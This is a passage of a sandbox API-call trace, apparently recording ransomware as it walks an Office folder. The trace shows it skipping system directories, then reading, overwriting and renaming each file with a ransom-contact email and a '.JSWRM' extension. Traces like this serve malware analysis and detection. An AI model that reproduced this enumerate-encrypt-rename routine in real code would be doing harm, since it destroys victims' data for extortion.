lpUsedDefaultChar=0x0) returned 5 [0141.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMARQ.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmarq.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.079] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=826) returned 1 [0141.079] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.079] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0141.081] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.081] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0141.081] CloseHandle (hObject=0x238) returned 1 [0141.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMARQ.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmarq.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMARQ.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmarq.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.082] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a53b55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50f94, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGMASTHD.DPV", cAlternateFileName="")) returned 1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2=".") returned 1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="..") returned 1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="...") returned 1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="windows") returned -1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="recovery") returned -1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="perflogs") returned -1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="documents and settings") returned -1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="system volume information") returned -1 [0141.082] lstrcmpiW (lpString1="DGMASTHD.DPV", lpString2="msocache") returned -1 [0141.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMASTHD.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMASTHD.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGMASTHD.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMASTHD.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMASTHD.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGMASTHD.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMASTHD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmasthd.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.083] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=331668) returned 1 [0141.083] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.083] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.098] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.098] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.098] CloseHandle (hObject=0x238) returned 1 [0141.098] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMASTHD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmasthd.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMASTHD.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmasthd.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.099] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71a4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGNAVBAR.DPV", cAlternateFileName="")) returned 1 [0141.099] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2=".") returned 1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="..") returned 1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="...") returned 1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="windows") returned -1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="recovery") returned -1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="perflogs") returned -1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="documents and settings") returned -1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="system volume information") returned -1 [0141.100] lstrcmpiW (lpString1="DGNAVBAR.DPV", lpString2="msocache") returned -1 [0141.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGNAVBAR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGNAVBAR.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGNAVBAR.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGNAVBAR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGNAVBAR.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGNAVBAR.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGNAVBAR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgnavbar.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.101] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29092) returned 1 [0141.101] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.101] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x71a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x71a0, lpOverlapped=0x0) returned 1 [0141.104] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.104] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x71a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x71a0, lpOverlapped=0x0) returned 1 [0141.104] CloseHandle (hObject=0x238) returned 1 [0141.104] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGNAVBAR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgnavbar.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGNAVBAR.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgnavbar.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.108] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11c2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGNAVBAR.XML", cAlternateFileName="")) returned 1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2=".") returned 1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="..") returned 1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="...") returned 1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="windows") returned -1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="recovery") returned -1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="perflogs") returned -1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="documents and settings") returned -1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="system volume information") returned -1 [0141.108] lstrcmpiW (lpString1="DGNAVBAR.XML", lpString2="msocache") returned -1 [0141.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGNAVBAR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGNAVBAR.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGNAVBAR.XML", lpUsedDefaultChar=0x0) returned 12 [0141.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGNAVBAR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGNAVBAR.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGNAVBAR.XML", lpUsedDefaultChar=0x0) returned 12 [0141.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGNAVBAR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgnavbar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.110] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4546) returned 1 [0141.110] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.110] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x11c0, lpOverlapped=0x0) returned 1 [0141.112] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.112] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x11c0, lpOverlapped=0x0) returned 1 [0141.112] CloseHandle (hObject=0x238) returned 1 [0141.112] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGNAVBAR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgnavbar.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGNAVBAR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgnavbar.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.113] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21bab08a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21bab08a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eeda, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGPICCAP.DPV", cAlternateFileName="")) returned 1 [0141.113] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2=".") returned 1 [0141.113] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="..") returned 1 [0141.113] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="...") returned 1 [0141.113] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="windows") returned -1 [0141.113] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="recovery") returned -1 [0141.113] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="perflogs") returned -1 [0141.114] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="documents and settings") returned -1 [0141.114] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.114] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="system volume information") returned -1 [0141.114] lstrcmpiW (lpString1="DGPICCAP.DPV", lpString2="msocache") returned -1 [0141.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPICCAP.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPICCAP.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPICCAP.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPICCAP.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPICCAP.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPICCAP.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPICCAP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpiccap.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.115] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=126682) returned 1 [0141.115] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.115] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1eed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1eed0, lpOverlapped=0x0) returned 1 [0141.124] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.124] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1eed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1eed0, lpOverlapped=0x0) returned 1 [0141.124] CloseHandle (hObject=0x238) returned 1 [0141.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPICCAP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpiccap.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPICCAP.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpiccap.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.125] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1aca, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGPICCAP.XML", cAlternateFileName="")) returned 1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2=".") returned 1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="..") returned 1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="...") returned 1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="windows") returned -1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="recovery") returned -1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="perflogs") returned -1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="documents and settings") returned -1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.125] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="system volume information") returned -1 [0141.126] lstrcmpiW (lpString1="DGPICCAP.XML", lpString2="msocache") returned -1 [0141.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPICCAP.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPICCAP.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPICCAP.XML", lpUsedDefaultChar=0x0) returned 12 [0141.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPICCAP.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPICCAP.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPICCAP.XML", lpUsedDefaultChar=0x0) returned 12 [0141.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPICCAP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpiccap.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.127] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6858) returned 1 [0141.127] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.127] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1ac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1ac0, lpOverlapped=0x0) returned 1 [0141.129] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.129] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1ac0, lpOverlapped=0x0) returned 1 [0141.129] CloseHandle (hObject=0x238) returned 1 [0141.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 